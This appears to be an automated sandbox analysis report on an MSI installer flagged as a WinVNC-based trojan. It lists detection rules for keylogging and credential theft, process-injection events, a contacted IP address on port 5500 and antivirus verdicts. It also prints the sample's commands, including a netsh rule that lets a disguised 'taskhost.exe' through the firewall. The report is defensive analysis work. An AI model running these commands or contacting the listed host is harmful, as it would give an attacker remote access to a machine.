description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Check if hotfix are applied	rule	check_patchlevel
description	Affect hook table	rule	win_hook
description	File Downloader	rule	Network_Downloader
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Install itself for autorun at Windows startup	rule	Persistence
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	Communications over P2P network	rule	Network_P2P_Win
description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communication using DGA	rule	Network_DGA
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Take ScreenShot	rule	ScreenShot
description	Escalate priviledges	rule	Escalate_priviledges
description	Steal credential	rule	local_credential_Steal

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess April 21, 2025, 10:25 a.m.	status_code: 0xc0000005 process_identifier: 2612 process_handle: 0x0000000000000094		0	0
NtTerminateProcess April 21, 2025, 10:25 a.m.	status_code: 0xc0000005 process_identifier: 2612 process_handle: 0x0000000000000094	1	0	0

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
cmdline	netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL
cmdline	netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL
cmdline	Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
cmdline	wmic process where (name="taskhost.exe") get commandline
cmdline	taskkill /im rundll32.exe /f

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 7f28d5a55ad8d5df516d23d7573238da11d72c4d
buffer	Buffer with sha1: 73c69d167a496e6b1ce71a13e9e9596404cb72dd

Communicates with host for which no DNS query was performed (1 event)

host

86.54.42.29

Enumerates services, possibly for anti-virtualization (1 event)

Time & API	Arguments	Status	Return	Repeated
EnumServicesStatusA April 21, 2025, 10:24 a.m.	service_handle: 0x008074f0 service_type: 48 service_status: 3		0	0

Drops a binary and executes it (1 event)

file	C:\Games\cmmc.cmd

Expresses interest in specific running processes (1 event)

process: potential process injection target

explorer.exe

One or more non-whitelisted processes were created (3 events)

parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2604 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef425f1e8,0x7fef425f1f8,0x7fef425f208
parent_process	chrome.exe	martian_process	"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1160,10399697192018759172,2665692538915347063,131072 --gpu-preferences=KAAAAAAAAAAABwAAAQAAAAAAAAAAAGAAAQAAAAAAAAAIAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x80ee --gpu-device-id=0xbeef --gpu-driver-vendor=Microsoft --gpu-driver-version=6.1.7600.16385 --gpu-driver-date=6-21-2006 --service-request-channel-token=F70E699DB89A5523589750F744F55B43 --mojo-platform-channel-handle=1192 --ignored=" --type=renderer " /prefetch:2

Found URLs in memory pointing to an IP address rather than a domain (potentially indicative of Command & Control traffic) (1 event)

url	http://127.0.0.1

Resumed a suspended thread in a remote process potentially indicative of process injection (50 out of 51 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1452 resumed a thread in remote process 2916
Process injection	Process 1452 resumed a thread in remote process 3016
Process injection	Process 1452 resumed a thread in remote process 2380
Process injection	Process 1452 resumed a thread in remote process 1976
Process injection	Process 3016 resumed a thread in remote process 2612
Process injection	Process 3016 resumed a thread in remote process 2776
Process injection	Process 2900 resumed a thread in remote process 2612
Process injection	Process 2380 resumed a thread in remote process 2268
Process injection	Process 2288 resumed a thread in remote process 2236
NtResumeThread April 21, 2025, 10:23 a.m.	thread_handle: 0x0000000000000930 suspend_count: 1 process_identifier: 2916	1	0	0
NtResumeThread April 21, 2025, 10:23 a.m.	thread_handle: 0x0000000000000934 suspend_count: 1 process_identifier: 3016	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x00000000000005b8 suspend_count: 1 process_identifier: 2380	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x00000000000001dc suspend_count: 1 process_identifier: 1976	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000248 suspend_count: 1 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000254 suspend_count: 0 process_identifier: 2776	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:25 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:25 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:25 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:25 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:25 a.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2612	1	0	0
NtResumeThread April 21, 2025, 10:24 a.m.	thread_handle: 0x000000000000006c suspend_count: 0 process_identifier: 2268	1	0	0

Creates VNC Remote Administration Tool Mutexes (1 event)

mutex

WinVNC_Win32_Instance_Mutex

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

Lionic	Riskware.Win32.GenericFCA.1!c
CTX	msi.trojan.winvnc
CAT-QuickHeal	BAT.Trojan.48572.GC
ALYac	Trojan.GenericKD.69894605
VIPRE	Application.GenericFCA.7
K7GW	Trojan ( 005ae24c1 )
K7AntiVirus	Trojan ( 005ae24c1 )
Arcabit	Application.GenericFCA.7 [many]
ESET-NOD32	multiple detections
Avast	Other:Malware-gen [Trj]
Cynet	Malicious (score: 99)
Kaspersky	not-a-virus:HEUR:RemoteAdmin.Win32.UltraVNC.gen
BitDefender	Application.GenericFCA.7
Emsisoft	Application.GenericFCA.7 (B)
F-Secure	PrivacyRisk.SPR/RemoteAdmin.vtoyf
Zillya	Tool.UltraVNC.Win32.468
Sophos	Troj/Agent-BKTZ
FireEye	Application.GenericFCA.7
Google	Detected
Avira	SPR/RemoteAdmin.vtoyf
Antiy-AVL	Trojan/Win32.WinVNC-based
GData	Trojan.GenericKD.69894567
Varist	ABRisk.RXAD-0
McAfee	Artemis!F66E9F35B07A
Ikarus	Trojan.Win32.Winvnc
Tencent	Bat.Trojan.Agent.Yfow
Fortinet	W32/WinVNC_based.AD!tr
AVG	Other:Malware-gen [Trj]
alibabacloud	Trojan:Win/WinVNC-based.AF

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

86.54.42.29:5500

Software-MSI.msi

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All